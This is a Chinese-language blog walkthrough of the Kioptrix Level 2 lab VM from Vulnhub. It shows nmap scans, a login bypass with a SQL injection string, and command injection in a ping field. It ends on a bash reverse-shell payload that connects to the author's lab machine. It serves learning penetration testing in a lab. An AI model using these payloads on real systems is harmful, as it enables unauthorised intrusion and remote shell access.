Kioptrix 2 Walkthrough (Vulnhub)

2020/09/01 22:35 · Kioptrix ·  原创文章 · 219阅读 · 0评论

简介 

KIOPTRIX VM映像挑战:
这个Kioptrix VM映像很容易挑战。游戏的目的是通过任何可能的方式获得root用户访问权限(除了实际入侵VM服务器或播放器外)。这些游戏的目的是学习漏洞评估和利用中的基本工具和技术。成功完成挑战的方法不止一种。
资料来源:http : //www.kioptrix.com/blog/? page_id= 135
资料来源:http://www.kioptrix.com/blog/? p = 49
这是#2的第二个版本。首次发布的Web应用程序存在错误
2012年2月9日:重新发布
2011年2月11日:原始版本

环境搭建

访问 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/下载vm镜像

三、实战渗透 

nmap扫描目标网段寻找主机 

xiaoze@bad:~$ nmap 192.168.2.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0037s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.014s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed

Nmap scan report for lumi-acpartner-mcn02_miap9740.lan (192.168.2.108)
Host is up (0.0078s latency).
All 1000 scanned ports on lumi-acpartner-mcn02_miap9740.lan (192.168.2.108) are closed

Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0036s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
9999/tcp open  abyss

Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for bad.lan (192.168.2.133)
Host is up (0.00027s latency).
All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0095s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed

Nmap scan report for 192.168.2.161
Host is up (0.0028s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Nmap scan report for MIX2S-ouyangxiaozede.lan (192.168.2.235)
Host is up (0.0060s latency).
All 1000 scanned ports on MIX2S-ouyangxiaozede.lan (192.168.2.235) are closed

Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds

确定目标主机为192.18.2.161 

xiaoze@bad:~$ sudo nmap -sS -sV -O  192.168.2.161
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:20 CST
Nmap scan report for 192.168.2.161
Host is up (0.00086s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
631/tcp  open  ipp        CUPS 1.1
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:E1:BD:4F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.10 seconds

发现80端口开放web服务,作为一个web狗,遇到web才是解题思路,访问网站http://192.168.2.161,访问之后是这样的,

admin:admin弱口令登陆密码错误,万能密码admin' or 1=1 -- -登陆成功

输入框里面输入baidu.com;ls -la 发现可以执行ls -la命令。

使用nc反弹shell, 

127.0.0.1; bash -i >& /dev/tcp/192.168.2.133/8877 0>&1